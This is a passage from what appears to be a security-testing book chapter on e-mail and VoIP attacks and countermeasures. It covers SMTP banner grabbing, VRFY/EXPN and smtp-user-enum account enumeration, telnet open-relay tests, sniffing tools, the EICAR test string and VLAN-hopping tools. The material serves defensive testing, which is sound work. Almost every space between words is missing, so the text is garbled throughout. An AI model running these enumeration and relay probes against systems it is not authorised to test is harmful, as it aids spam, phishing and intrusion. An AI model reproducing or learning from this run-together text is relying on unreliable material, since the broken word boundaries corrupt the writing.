Thefirstchapterinthispartcoversvariousmessagingsystemhacksandcountermeasuresfore-mailandVoiceoverIP(VoIP)systems.Next,thispartlooksatwebexploits,alongwithsomecountermeasurestosecurewebsitesandapplicationsfromtheelements.Finally,thispartcoversattacksagainstdatabaseserversandstoragesystems.Itcoversbothstructureddatafoundinvariousdatabasesystemsandunstructureddata,otherwiseknownasfilesscatteredacrossthenetworkwaitingtobeexploited.

Chapter14

CommunicationandMessagingSystemsInThisChapter

Attackinge-mailsystems

Assailinginstantmessaging

AssaultingVoiceoverIPapplications

Communicationsystemssuchase-mailandVoiceoverIP(VoIP)oftencreatevulnerabilitiesthatpeopleoverlook.Why?Well,frommyexperience,messagingsoftware—bothattheserverandclientlevel—isvulnerablebecausenetworkadministratorsoftenbelievethatfirewallsandantivirussoftwareareallthat’sneededtokeeptroubleaway,ortheysimplyforgetaboutsecuringthesesystemsaltogether.

Inthischapter,Ishowyouhowtotestforcommone-mailandVoIPissues.Ialsooutlinekeycountermeasurestohelppreventthesehacksagainstyoursystems.

IntroducingMessagingSystemVulnerabilities

Practicallyallmessagingapplicationsarehackingtargetsonyournetwork.Giventheproliferationandbusinessdependenceone-mail,justaboutanythingisfairgame.DittowithVoIP.It’sdownrightscarywhatpeoplewithillintentcandowithit.

Withmessagingsystems,oneunderlyingweaknessesisthatmanyofthesupportingprotocolsweren’tdesignedwithsecurityinmind—especiallythosedevelopedseveraldecadesagowhensecuritywasn’tnearlytheissueitistoday.Thefunnythingisthatevenmodern-daymessagingprotocols—oratleasttheimplementationoftheprotocols—arestillsusceptibletoserioussecurityproblems.Furthermore,convenienceandusabilityoftenoutweightheneedforsecurity.

Manyattacksagainstmessagingsystemsarejustminornuisances;otherscaninflictseriousharmonyourinformationandyourorganization’sreputation.Maliciousattacksagainstmessagingsystemsincludethefollowing:

TransmittingmalwareCrashingserversObtainingremotecontrolofworkstationsCapturinginformationwhileittravelsacrossthenetworkPerusinge-mailsstoredonserversandworkstationsGatheringmessaging-trendinformationvialogfilesoranetworkanalyzerthatcantipofftheattackeraboutconversationsbetweenpeopleandorganizations(oftencalledtrafficanalysisorsocialnetworkanalysis)CapturingandreplayingphoneconversationsGatheringinternalnetworkconfigurationinformation,suchashostnamesandIPaddresses

Theseattackscanleadtosuchproblemsasunauthorized—andpotentiallyillegal—disclosureofsensitiveinformation,aswellaslossofinformationaltogether.

RecognizingandCounteringE-MailAttacks

Thefollowingattacksexploitthemostcommone-mailsecurityvulnerabilitiesI’veseen.Thegoodnewsisthatyoucaneliminateorminimizemostofthemtothepointwhereyourinformationisnotatrisk.Someoftheseattacksrequirethebasichackingmethodologies:gatheringpublicinformation,scanningandenumeratingyoursystems,andfindingandexploitingthevulnerabilities.Otherscanbecarriedoutbysendinge-mailsorcapturingnetworktraffic.

E-mailbombsE-mailbombsattackbycreatingdenialofservice(DoS)conditionsagainstyoure-mailsoftwareandevenyournetworkandInternetconnectionbytakingupalargeamountofbandwidthand,sometimes,requiringlargeamountsofstoragespace.E-mailbombscancrashaserverandprovideunauthorizedadministratoraccess—yes,evenwithtoday’sseeminglyendlessstoragecapacities.

AttachmentsAnattackercancreateanattachment-overloadattackbysendinghundredsorthousandsofe-mailswithverylargeattachmentstooneormorerecipientsonyournetwork.

Attacksusinge-mailattachments

Attachmentattackshaveacoupleofgoals:

Thewholee-mailservermightbetargetedforacompleteinterruptionofservicewiththesefailures:

Storageoverload:Multiplelargemessagescanquicklyfillthetotalstoragecapacityofane-mailserver.Ifthemessagesaren’tautomaticallydeletedbytheserverormanuallydeletedbyindividualuseraccounts,theserverwillbeunabletoreceivenewmessages.

ThiscancreateaseriousDoSproblemforyoure-mailsystem,eithercrashingitorrequiringyoutotakeyoursystemofflinetocleanupthejunkthathasaccumulated.A100MBfileattachmentsenttentimesto100userscantake100GBofstoragespace.Thatcanaddup!

Bandwidthblocking:Anattackercancrashyoure-mailserviceorbringittoacrawlbyfillingtheincomingInternetconnectionwithjunk.Evenifyoursystemautomaticallyidentifiesanddiscardsobviousattachmentattacks,thebogusmessageseatresourcesanddelayprocessingofvalidmessages.

Anattackonasinglee-mailaddresscanhaveseriousconsequencesiftheaddress

isforanimportantuserorgroup.

Countermeasuresagainste-mailattachmentattacks

Thesecountermeasurescanhelppreventattachment-overloadattacks:

Limitthesizeofeithere-mailsore-mailattachments.Checkforthisoptioninyoure-mailserver’sconfigurationsettings(suchasthoseprovidedinMicrosoftExchange),youre-mailcontentfilteringsystem,andevenatthee-mailclientlevel.

Limiteachuser’sspaceontheserver.Thisdenieslargeattachmentsfrombeingwrittentodisk.Limitmessagesizesforinboundandevenoutboundmessagesshouldyouwanttopreventauserfromlaunchingthisattackfrominsideyournetwork.Ifindafewgigabytesisagoodlimit,butitalldependsonyournetworksize,storageavailability,businessculture,andsoon,sothinkthroughthisonecarefullybeforeputtinganythinginplace.

ConsiderusingSFTPorHTTPinsteadofe-mailforlargefiletransfers.Therearenumerouscloud-basedfiletransferservicesavailablesuchasDropboxandBox.Youcanalsoencourageyouruserstousedepartmentalsharesorpublicfolders.Bydoingso,youcanstoreonecopyofthefileonaserverandhavetherecipientdownloadthefileonhisorherownworkstation.

Contrarytopopularbeliefanduse,thee-mailsystemshouldnotbeaninformationrepository,butthat’sexactlywhate-mailhasevolvedinto.Ane-mailserverusedforthispurposecancreateunnecessarylegalandregulatoryrisksandcanturnintoadownrightnightmareifyourbusinessreceivesane-discoveryrequestrelatedtoalawsuit.Animportantpartofyoursecurityprogramistodevelopaninformationclassificationandretentionprogramtohelpwithrecordsmanagement.Butdon’tgoitalone.Getotherssuchasyourlawyer,HRmanager,andCIOinvolved.Thisnotonlyhelpsensuretherightpeopleareonboardbutitcanhelpensureyourbusinessdoesn’tgetintotroubleforholdingtoomany—ortoofew—electronicrecordsintheeventofalawsuitorinvestigation.

ConnectionsAhackercansendahugenumberofe-mailssimultaneouslytoaddressesinyoure-mailsystem.Malwarethat’spresentonyournetworkcandothesamethingfrominsideyournetworkifthere’sanopenSimpleMailTransferProtocol(SMTP)relayonyournetwork(whichisoftenthecase).(Moreaboutthatfollows.)TheseconnectionattackscancausetheservertogiveuponservicinganyinboundoroutboundTCPrequests.Thissituationcanleadtoacompleteserverlockuporacrash,oftenresultinginaconditioninwhichtheattackerisallowedadministratororrootaccesstothesystem.

Attacksusingfloodsofe-mails

Anattackusingafloodofe-mailsisoftencarriedoutinspamattacksandotherdenialofserviceattempts.

Countermeasuresagainstconnectionattacks

Prevente-mailattacksasfaroutonyournetworkperimeterasyoucan.Themoretrafficormaliciousbehavioryoukeepoffyoure-mailserversandclients,thebetter.

Manye-mailserversallowyoutolimitthenumberofresourcesusedforinboundconnections,asshownintheMaximumnumberofsimultaneousthreadssettingforIceWarpe-mailserverinFigure14-1.Thissettingiscalleddifferentthingsfordifferente-mailserversande-mailfirewalls,socheckyourdocumentation.Completelystoppinganunlimitednumberofinboundrequestscanbeimpossible.However,youcanminimizetheimpactoftheattack.Thissettinglimitstheamountofserverprocessortime,whichcanhelpduringaDoSattack.

Figure14-1:Limitingthenumberofresourcesthathandleinboundmessages.

Eveninlargecompanies,orifyou’reusingacloud-basede-mailservicesuchasOffice365,there’slikelynoreasonthatthousandsofinbounde-maildeliveriesshouldbenecessarywithinashorttimeperiod.

E-mailserverscanbeprogrammedtodelivere-mailstoaserviceforautomatedfunctions,suchascreatethise-commerceorderwhenamessagefromthisaccountisreceived.IfDoSprotectionisn’tbuiltintothesystem,anattackercancrashboththeserverandtheapplicationthatreceivesthesemessagesandpotentiallycreatee-commerceliabilitiesandlosses.Thiscanhappenmoreeasily

one-commercewebsiteswhenCAPTCHA(shortforCompletelyAutomatedPublicTuringtesttotellComputersandHumansApart)isnotusedonforms.IcoverwebapplicationsecurityinChapter15.

Automatede-mailsecuritycontrolsYoucanimplementthefollowingcountermeasuresasanadditionallayerofsecurityforyoure-mailsystems:

Tarpitting:Tarpittingdetectsinboundmessagesdestinedforunknownusers.Ifyoure-mailserversupportstarpitting,itcanhelppreventspamorDoSattacksagainstyourserver.Ifapredefinedthresholdisexceeded—say,morethan100messagesinoneminute—thetarpittingfunctioneffectivelyshunstrafficfromthesendingIPaddressforaperiodoftime.E-mailfirewalls:E-mailfirewallsandcontent-filteringapplicationsfromvendorssuchasSymantecandBarracudaNetworkscangoalongwaytowardspreventingvariouse-mailattacks.Thesetoolsprotectpracticallyeveryaspectofane-mailsystem.Perimeterprotection:Althoughnote-mail-specific,manyfirewallandIPSsystemscandetectvariouse-mailattacksandshutofftheattackerinrealtime.Thiscancomeinhandyduringanattack.CAPTCHA:UsingCAPTCHAonweb-basede-mailformscanhelpminimizetheimpactofautomatedattacksandlessenyourchancesofe-mailfloodinganddenialofservice—evenwhenyou’reperformingseeminglybenignwebvulnerabilityscans.Thesebenefitsreallycomeinhandywhentestingyourwebsitesandapplications,asIdiscussinChapter15.

BannersWhenhackingane-mailserver,ahacker’sfirstorderofbusinessisperformingabasicbannergrabtoseewhetherhecandiscoverwhate-mailserversoftwareisrunning.ThisisoneofthemostcriticalteststofindoutwhattheworldknowsaboutyourSMTP,POP3,andIMAPservers.

GatheringinformationFigure14-2showsthebannerdisplayedonane-mailserverwhenabasictelnetconnectionismadeonport25(SMTP).Todothis,atacommandprompt,simplyentertelnetipor_hostname_of_your_server25.ThisopensatelnetsessiononTCPport25.

Figure14-2:AnSMTPbannershowingserver-versioninformation.

Thee-mailsoftwaretypeandserverversionareoftenveryobviousandgivehackerssomeideasaboutpossibleattacks,especiallyiftheysearchavulnerabilitydatabaseforknownvulnerabilitiesofthatsoftwareversion.Figure14-3showsthesamee-mailserverwithitsSMTPbannerchangedfromthedefault(okay,thepreviousonewas,too)todisguisesuchinformationasthee-mailserver’sversionnumber.

Figure14-3:AnSMTPbannerthatdisguisestheversioninformation.

YoucangatherinformationonPOP3andIMAPe-mailservicesbytelnettingtoport110(POP3)orport143(IMAP).

IfyouchangeyourdefaultSMTPbanner,don’tthinkthatnoonecanfigureouttheversion.Generalvulnerabilityscannerscanoftendetecttheversionofyoure-mailserver.OneLinux-basedtoolcalledsmtpscan(www.freshports.org/security/smtpscan/)determinese-mailserverversioninformationbasedonhowtheserverrespondstomalformedSMTPrequests.Figure14-4showstheresultsfromsmtpscanagainstthesameservershowninFigure14-3.Thesmtpscantooldetectedtheproductandversionnumberofthee-mailserver.

Figure14-4:smtpscangathersversioninfoevenwhentheSMTPbannerisdisguised.

http://www.freshports.org/security/smtpscan/

CountermeasuresagainstbannerattacksThereisn’ta100percentsecurewayofdisguisingbannerinformation.IsuggestthesebannersecuritytipsforyourSMTP,POP3,andIMAPservers:

Changeyourdefaultbannerstoconcealtheinformation.Makesurethatyou’realwaysrunningthelatestsoftwarepatches.Hardenyourserverasmuchaspossiblebyusingwell-knownbestpracticesfromsuchresourcesastheCenterforInternetSecurity(www.cisecurity.org)andNIST(http://csrc.nist.gov).

SMTPattacksSomeattacksexploitweaknessesinSMTP.Thise-mailcommunicationprotocol—whichisoverthreedecadesold—wasdesignedforfunctionality,notsecurity.

AccountenumerationAcleverwaythatattackerscanverifywhethere-mailaccountsexistonaserverissimplytotelnettotheserveronport25andruntheVRFYcommand.TheVRFY—shortforverify—commandmakesaservercheckwhetheraspecificuserIDexists.Spammersoftenautomatethismethodtoperformadirectoryharvestattack(DHA),whichisawayofgleaningvalide-mailaddressesfromaserverordomainsohackersknowwhomtosendspam,phishing,ormalware-infectedmessagesto.

Attacksusingaccountenumeration

Figure14-5showshoweasyitistoverifyane-mailaddressonaserverwiththeVRFYcommandenabled.Scriptingthisattackcantestthousandsofe-mailaddresscombinations.

Figure14-5:UsingVRFYtoverifythatane-mailaddressexists.

TheSMTPcommandEXPN—shortforexpand—mightallowattackerstoverifywhatmailinglistsexistonaserver.Youcansimplytelnettoyoure-mailserveronport25andtryEXPNonyoursystemifyouknowofanymailingliststhatmightexist.Figure14-6showshowtheresultmightlook.Scriptingthisattackandtesting


http://csrc.nist.gov/

thousandsofmailinglistcombinationsissimple.

Figure14-6:UsingEXPNtoverifythatamailinglistexists.

Youmightgetbogusinformationfromyourserverwhenperformingthesetwotests.SomeSMTPservers(suchasMicrosoftExchange)don’tsupporttheVRFYandEXPNcommands,andsomee-mailfirewallssimplyignorethemorreturnfalseinformation.

AnotherwaytosomewhatautomatetheprocessistousetheEmailVerifyprograminTamoSoft’sEssentialNetTools(www.tamos.com/products/nettools).AsshowninFigure14-7,yousimplyenterane-mailaddress,clickStart,andEmailVerifyconnectstotheserverandpretendstosendane-mail.

http://www.tamos.com/products/nettools

Figure14-7:UsingEmailVerifytoverifyane-mailaddress.

Yetanotherwaytocapturevalide-mailaddressesistousetheHarvester(https://github.com/laramies/theHarvester)togleanaddressesviaGoogleandothersearchengines.AsIoutlineinChapter9,youcandownloadKaliLinuxfromwww.kali.orgtoburntheISOimagetoCDorboottheimagedirectlythroughVMwareorVirtualBox.IntheKaliLinuxGUI,simplychooseApplications ⇒ InformationGathering ⇒ SMTPAnalysis ⇒ smtp-user-enumandentersmtp-user-enum–MVRFY–u<usernameyouwishtoconfirm>-tserverIP/hostname,asshowninFigure14-8.

https://github.com/laramies/theHarvester

https://www.kali.org

Figure14-8:Usingsmtp-user-enumforgleaninge-mailaddresses.

Youcancustomizesmtp-user-enumqueriesaswellusing,forexample,EXPNinplaceofVRFYand–Uandalistofusernamesinafiletoquerymorethanoneuser.Simplyentersmtp-user-enumforallthesearchoptions.

Countermeasuresagainstaccountenumeration

Ifyou’rerunningExchange,accountenumerationwon’tbeanissue.Ifyou’renotrunningExchange,thebestsolutionforpreventingthistypeofe-mailaccountenumerationdependsonwhetheryouneedtoenabletheVRFYandEXPNcommands:

DisableVRFYandEXPNunlessyouneedyourremotesystemstogatheruserandmailinglistinformationfromyourserver.IfyouneedVRFYandEXPNfunctionality,checkyoure-mailserverore-mailfirewalldocumentationfortheabilitytolimitthesecommandstospecifichostsonyournetworkortheInternet.

Finally,workwithyourmarketingteamandwebdeveloperstoensurethatcompanye-mailaddressesarenotpostedonyourorganization’swebsiteoronsocialmediawebsites.Also,educateyourusersaboutnotdoingthis.

RelaySMTPrelayletsuserssende-mailsthroughexternalservers.Opene-mailrelaysaren’ttheproblemtheyusedtobe,butyoustillneedtocheckforthem.Spammersandcriminalhackerscanuseane-mailservertosendspamormalwarethroughe-mailundertheguiseoftheunsuspectingopen-relayowner.

Besuretotestforopenrelayfrombothoutsideandinsideyournetwork.Ifyoutestyourinternalsystems,youmightgetfalsepositivesbecauseoutbounde-mailrelayingmightbeconfiguredandnecessaryforyourinternale-mailclientstosendmessagestotheoutsideworld.However,ifaclientsystemiscompromised,thatissuecouldbejustwhatthebadguysneedtolaunchaspamormalwareattack.

Automatictesting

HereareacoupleofeasywaystotestyourserverforSMTPrelay:

VulnerabilityScanners:ManyvulnerabilityscannerssuchasNexposeandQualysGuardwillfindopene-mailrelayvulnerabilities.

Windows-basedtools:OneexampleisNetScanToolsPro(www.netscantools.com).YoucanrunanSMTPRelaycheckonyoure-mailserverwithNetScanToolsPro,asshowninFigure14-9.

AlthoughsomeSMTPserversacceptinboundrelayconnectionsandmakeitlooklikerelayingworks,thisisn’talwaysthecasebecausetheinitialconnectionmightbeallowed,butthefilteringactuallytakesplacebehindthescenes.Checkwhetherthee-mailactuallymadeitthroughbycheckingtheaccountyousentthetestrelaymessageto.

Figure14-9:UsingNetScanToolsProSMTPServerTeststocheckforanopene-mailrelay.

InNetScanToolsPro,yousimplyentervaluesfortheSMTPmailservernameandYourSendingDomainName.InsideTestMessageSettings,entertheRecipientEmail


AddressandSender’sEmailAddress.Ifthetestissuccessful,NetScanToolsProwillopenawindowthatsays“MessageSentSuccessfully.”

YoucanalsoviewtheresultsinthemainSMTPServerTestswindowandgenerateaformalreportbysimplyclickingViewResultsinaWebBrowserandthenclickingViewRelayTestResults.

Manualtesting

YoucanmanuallytestyourserverforSMTPrelaybytelnettingtothee-mailserveronport25.Followthesesteps:

1. Telnettoyourserveronport25.

Youcandothisintwoways:

Useyourfavoritegraphicaltelnetapplication,suchasHyperTerminal(whichcomeswithWindows)orSecureCRT(www.vandyke.com/products/securecrt/index.html).EnterthefollowingcommandataWindowsorLinuxcommandprompt:

telnetmailserver_address25

YoushouldseetheSMTPwelcomebannerwhentheconnectionismade.

2. Enteracommandtotelltheserver,“Hi,I’mconnectingfromthisdomain.”

Aftereachcommandinthesesteps,youshouldreceiveadifferent-numberedmessage,suchas999OK.Youcanignorethesemessages.

3. Enteracommandtotelltheserveryoure-mailaddress.

Forexample:mailfrom:[email protected]

[email protected].

4. Enteracommandtotelltheserverwhotosendthee-mailto.

Forexample:rcptto:[email protected]

Again,anye-mailaddresswillsuffice.

5. Enteracommandtotelltheserverthatthemessagebodyistofollow.

Forexample:data

6. Enterthefollowingtextasthebodyofthemessage:Arelaytest!

7. Endthecommandwithaperiodonalinebyitself.

http://www.vandyke.com/products/securecrt/index.html

mailto:[email protected]

Youcanenter?orhelpatthefirsttelnetprompttoseealistofallthesupportedcommandsand,dependingontheserver,gethelpontheuseofthecommands.

Thefinalperiodmarkstheendofthemessage.Afteryouenterthisfinalperiod,yourmessagewillbesentifrelayingisallowed.

8. Checkforrelayingonyourserver:

LookforamessagesimilartoRelaynotallowedcomingbackfromtheserver.

Ifyougetamessagesimilartothis,SMTPrelayingiseithernotallowedonyourserverorisbeingfilteredbecausemanyserversblockmessagesthatappeartooriginatefromtheoutsideyetcomefromtheinside.

Youmightgetthismessageafteryouenterthercptto:command.

Ifyoudon’treceiveamessagefromyourserver,checkyourInboxfortherelayede-mail.

Ifyoureceivetheteste-mailyousent,SMTPrelayingisenabledonyourserverandprobablyneedstobedisabled.Thelastthingyouwantistoletspammersorotherattackersmakeitlooklikeyou’resendingtonsofspam,orworse,tobeblacklistedbyoneormoreoftheblacklistproviders.Endinguponablacklistcandisrupte-mailsendingandreceiving—notgoodforbusiness!

CountermeasuresagainstSMTPrelayattacks

Youcanimplementthefollowingcountermeasuresonyoure-mailservertodisableoratleastcontrolSMTPrelaying:

DisableSMTPrelayonyoure-mailserver.SMTPshouldbedisabledbydefault.However,itpaystocheck.Ifyoudon’tknowwhetheryouneedSMTPrelay,youprobablydon’t.YoucanenableSMTPrelayforspecifichostsontheserverorwithinyourfirewallconfiguration.Enforceauthenticationifyoure-mailserverallowsit.Youmightbeabletorequirepasswordauthenticationonane-mailaddressthatmatchesthee-mailserver’sdomain.Checkyoure-mailserverandclientdocumentationfordetailsonsettingupthistypeofauthentication.

E-mailheaderdisclosuresIfyoure-mailclientandserverareconfiguredwithtypicaldefaults,amaliciousattackermightfindcriticalpiecesofinformation:

InternalIPaddressofyoure-mailclientmachine(whichcanleadtotheenumerationofyourinternalnetworkandeventualexploitationviaphishingand/orsubsequentmalwareinfection)Softwareversionsofyourclientande-mailserveralongwiththeirvulnerabilitiesHostnamesthatcandivulgeyournetworknamingconventions

Testing

Figure14-10showstheheaderinformationrevealedinateste-mailIsenttomyfreewebaccount.Asyoucansee,itshowsoffquiteabitofinformationaboutmye-mailsystem:

ThethirdReceivedlinedisclosesmysystem’shostname,IPaddress,servername,ande-mailclientsoftwareversion.TheX-MailerlinedisplaystheMicrosoftOutlookversionIusedtosendthismessage.

Figure14-10:Criticalinformationrevealedine-mailheaders.

Countermeasuresagainstheaderdisclosures

Thebestcountermeasuretopreventinformationdisclosuresine-mailheadersistoconfigureyoure-mailserverore-mailfirewalltorewriteyourheaders,byeitherchangingtheinformationshownorremovingit.Checkyoure-mailserverorfirewalldocumentationtoseewhetherthisisanoption.

Ifheaderrewritingisnotavailable(orevenallowedbyyourISP),youstillmightpreventthesendingofsomecriticalinformation,suchasserversoftwareversionnumbersandinternalIPaddresses.

CapturingtrafficE-mailtraffic,includingusernamesandpasswords,canbecapturedwithanetworkanalyzerorane-mailpacketsnifferandreconstructor.

Mailsnarfisane-mailpacketsnifferandreconstructorthat’spartofthedsniffpackage(http://sectools.org/tool/dsniff).There’sagreatcommercial(yetlow-cost)programcalledNetResident(www.tamos.com/products/netresident),too.YoucanalsouseCain&Abel(www.oxid.it/cain.html)tohighlighte-mail-in-transitweaknesses.IcoverpasswordcrackingusingthistoolandothersinChapter8.

Iftrafficiscaptured,ahackerormaliciousinsidercancompromiseonehostandpotentiallyhavefullaccesstoanotheradjacenthost,suchasyoure-mailserver.

MalwareE-mailsystemsareregularlyattackedbysuchmalwareasvirusesandworms.Oneofthemostimportanttestsyoucanrunformalwarevulnerabilityistoverifythatyourantivirussoftwareisactuallyworking.

Beforeyoubegintestingyourantivirussoftware,makesurethatyouhavethelatestvirussoftwareengineandsignaturesloaded.

EICARoffersasafeoptionforcheckingtheeffectivenessofyourantivirussoftware.AlthoughEICARisbynomeansacomprehensivemethodoftestingformalwarevulnerabilities,itservesasagood,safestart.

EICARisaEuropean-basedmalwarethinktankthathasworkedinconjunctionwithanti-malwarevendorstoprovidethisbasicsystemtest.TheEICARteststringtransmitsinthebodyofane-mailorasafileattachmentsothatyoucanseehowyourserverandworkstationsrespond.Youbasicallyaccess(load)thisfile—whichcontainsthefollowing68-characterstring—onyourcomputertoseewhetheryourantivirusorothermalwaresoftwaredetectsit:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Youcandownloadatextfilewiththisstringfromwww.eicar.org/86-0-Intended-use.html.Severalversionsofthefileareavailableonthissite.IrecommendtestingwiththeZipfiletomakesurethatyourantivirussoftwarecandetectmalwarewithincompressedfiles.

Whenyourunthistest,youmayseeresultsfromyourantivirussoftwaresimilartoFigure14-11.

http://sectools.org/tool/dsniff



http://www.eicar.org/86-0-Intended-use.html

Figure14-11:UsingtheEICARteststringtotestantivirussoftware.

Inadditiontotestingyourantivirussoftware,youcanattacke-mailsystemsusingothertoolsIcoverinthisbook.Metasploit(www.metasploit.com)enablesyoutodiscovermissingpatchesinExchangeandotherserversthathackerscouldexploit.Brutus(www.hoobie.net/brutus)enablesyoutotestthecrackingofwebandPOP3/IMAPpasswords.

Generalbestpracticesforminimizinge-mailsecurityrisksThefollowingcountermeasureshelpkeepmessagesassecureaspossible.

SoftwaresolutionsTherightsoftwarecanneutralizemanythreats:

Useanti-malwaresoftwareonthee-mailserver—better,thee-mailgateway—topreventmalwarefromreachinge-mailclients.Cloud-basede-mailsystemssuchasthoseofferedbyGoogleandMicrosoftoftenhavesuchprotectionbuiltin.Usingmalwareprotectiononyourclientsisagiven.Applythelatestoperatingsystemande-mailserversecuritypatchesconsistentlyandafteranysecurityalertsarereleased.

Encrypt(where’sitreasonable).YoucanuseS/MIMEorPGPtoencryptsensitivemessagesorusee-mailencryptionatthedesktoplevelortheserverore-mailgateway.Betteryet(i.e.aneasiermeans),youcanalsouseTLSviathePOP3S,IMAPS,andSMTPSprotocols.Thebestoptionmaybetouseane-mailsecurityapplianceorcloudservicethatsupportsthesendingandreceivingofencryptede-mailsviaawebbrowseroverHTTPS.

Don’tdependonyouruserstoencryptmessages.Aswithanyother



securitypolicyorcontrol,relyingonuserstomakesecuritydecisionsoftenendspoorly.Useanenterprisesolutiontoencryptmessagesautomaticallyinstead.

Makesurethatencryptedfilesande-mailscanbeprotectedagainstmalware.

Encryptiondoesn’tkeepmalwareoutoffilesore-mails.Youjusthaveencryptedmalwarewithinthefilesore-mails.Encryptionkeepsyourserverorgatewayanti-malwarefromdetectingthemalwareuntilitreachesthedesktop.

Makeitpolicyforusersnottoopenunsolicitede-mailsoranyattachments,especiallythosefromunknownsenders,andcreateongoingawarenesssessionsandotherreminders.Planforuserswhoignoreorforgetaboutthepolicyofnotopeningunsolicitede-mailsandattachments.Itwillhappen!

OperatingguidelinesSomesimpleoperatingrulescankeepyourwallshighandtheattackersoutofyoure-mailsystems:

Putyoure-mailserverbehindafirewallonadifferentnetworksegmentfromtheInternetandfromyourinternalLAN—ideallyinademilitarizedzone(DMZ).Hardenbydisablingunusedprotocolsandservicesonyoure-mailserver.Runyoure-mailserverandperformmalwarescanningondedicatedserversifpossible(potentiallyevenseparatinginboundandoutboundmessages).Doingsocankeepmaliciousattacksoutofotherserversandinformationintheeventthee-mailserverishacked.Logalltransactionswiththeserverincaseyouneedtoinvestigatemalicioususe.Besuretomonitortheselogsaswell!Ifyoucannotjustifymonitoring,consideroutsourcingthisfunctiontoamanagedsecurityservicesprovider.Ifyourserverdoesn’tneedcertaine-mailservicesrunning(SMTP,POP3,andIMAP),disablethem—immediately.Forweb-basede-mail,suchasMicrosoft’sOutlookWebAccess(OWA),properlytestandsecureyourwebserverapplicationandoperatingsystembyusingthetestingtechniquesandhardeningresourcesImentionthroughoutthisbook.Requirestrongpasswords.Beitstandaloneaccountsordomain-levelExchangeorsimilaraccounts,anypasswordweaknessesonthenetworkwilltrickleovertoe-mailandsurelybeexploitedbysomeoneviaOutlookWebAccessorPOP3.IcoverpasswordhackinginChapter8.Ifyou’rerunningsendmail—especiallyanolderversion—considerrunninga

securealternative,suchasPostfix(www.postfix.org)orqmail(www.qmail.org).

http://www.postfix.org

http://www.qmail.org

UnderstandingVoiceoverIPAwidely-usedtechnologyinenterprisestodayisVoiceoverIP(VoIP).Whetherit’sin-houseVoIPsystemsorsystemsforremoteusers,VoIPservers,softphones,andotherrelatedcomponentshavetheirownsetofsecurityvulnerabilities.Likemostthingssecurity-related,manypeoplehaven’tthoughtaboutthesecurityissuessurroundingvoiceconversationstraversingtheirnetworksortheInternet—butitcertainlyneedstobeonyourradar.Don’tfret—it’snottoolatetomakethingsright.Justremember,though,thatevenifprotectivemeasuresareinplace,VoIPsystemsneedtobeincludedaspartofyouroverallsecuritytestingstrategyonacontinuousbasis.

VoIPvulnerabilitiesAswithanytechnologyorsetofnetworkprotocols,thebadguysarealwaysgoingtofigureouthowtobreakin.VoIPiscertainlynodifferent.Infact,givenwhat’satstake(phoneconversationsandphonesystemavailability),there’scertainlyalottolose.

VoIP-relatedsystemsarenomore(orless)securethanothercommoncomputersystems.Why?It’ssimple.VoIPsystemshavetheirownoperatingsystem,theyhaveIPaddresses,andthey’reaccessibleonthenetwork.CompoundingtheissueisthefactthatmanyVoIPsystemshousemoreintelligence—afancywordfor“morestuffthatcangowrong”—whichmakesVoIPnetworksevenmorehackable.

IfyouwanttofindoutmoreabouthowVoIPoperates,whichwillundoubtedlyhelpyourootoutvulnerabilities,checkoutVoIPForDummiesbyTimothyV.Kelly.

Ononehand,VoIPsystemshavevulnerabilitiesverysimilartoothersystemsIcoverinthisbook,including

DefaultsettingsMissingpatchesWeakpasswords

That’swhyusingthestandardvulnerabilityscanningtoolsIcoverisimportant.Figure14-12showsvariousvulnerabilitiesassociatedwiththeauthenticationmechanisminthewebinterfaceofaVoIPadapter.

Figure14-12:AWebInspectscanofaVoIPnetworkadaptershowingseveralweaknesses.

Lookingattheseresults,apparentlythisdeviceisjustabasicwebserver.That’sexactlymypoint—VoIPsystemsarenothingmorethannetworkedcomputersystemsthathavevulnerabilitiesthatcanbeexploited.

Ontheotherhand,twomajorsecurityweaknessesaretiedspecificallytoVoIP.Thefirstisthatofphoneservicedisruption.Yep,VoIPissusceptibletodenialofservicejustlikeanyothersystemorapplication.VoIPisasvulnerableasthemosttiming-sensitiveapplicationsoutthere,giventhelowtolerancefolkshaveforchoppyanddroppedphoneconversations(cellphonesaside,ofcourse).TheotherbigweaknesswithVoIPisthatvoiceconversationsareusuallynotencryptedandthuscanbeinterceptedandrecorded.Imaginethefunabadguycouldhaverecordingconversationsandblackmailinghisvictims.Thisisveryeasyonunsecuredwirelessnetworks,butasIshowintheupcoming“Capturingandrecordingvoicetraffic”section,it’salsoprettysimpletocarryoutonwirednetworks.

IfaVoIPnetworkisnotprotectedvianetworksegmentation,suchasavirtuallocalareanetwork(VLAN),thenthevoicenetworkisespeciallysusceptibletoeavesdropping,denialofservice,andotherattacks.ButtheVLANbarriercanbe

overcomeinmanyenvironmentsbyusingatoolcalledVoIPHopper(http://voiphopper.sourceforge.net).Justwhenyouthinkyourvoicesystemsaresecure,atoollikeVoIPHoppercomesalong.Gottaloveinnovation!

Unliketypicalcomputersecurityvulnerabilities,theseissueswithVoIParen’teasilyfixedwithsimplesoftwarepatches.ThesevulnerabilitiesareembeddedintotheSessionInitiationProtocol(SIP)andReal-timeTransportProtocol(RTP)thatVoIPusesforitscommunications.ThefollowingaretwoVoIP-centrictestsyoushouldusetoassessthesecurityofyourvoicesystems.

It’simportanttonotethatalthoughSIPisthemostwidelyusedVoIPprotocol,thereisH.323.So,don’tspinyourwheelstestingforSIPflawsifH.323istheprotocolinuse.Refertowww.packetizer.com/ipmc/h323_vs_sipforadditionaldetailsonH.323versusSIP.

ScanningforvulnerabilitiesOutsidethebasicnetwork,OS,andwebapplicationvulnerabilities,youcanuncoverotherVoIPissuesifyouusetherighttools.ThegoodnewsisthatyoulikelyalreadyhavethesetoolsatyourdisposalintheformofnetworkvulnerabilityscannerssuchasNexpose(www.rapid7.com/products/nexpose)andwebvulnerabilityscannerssuchasNetsparker(www.netsparker.com).CommonflawsintheVoIPcallmanagersandphonesincludeweakpasswords,cross-sitescripting,andmissingpatchesthatcanbeexploitedusingatoolsuchasMetasploit.

KaliLinuxhasseveralVoIPtoolsbuiltinviaApplications/VulnerabilityAnalysis/VoIPTools.OtherfreetoolsforanalyzingSIPtrafficarePROTOS(www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html),andsipsak(www.voip-info.org/wiki/view/Sipsak).AgoodwebsitethatlistsallsortsofVoIPtoolsiswww.voipsa.org/Resources/tools.php.

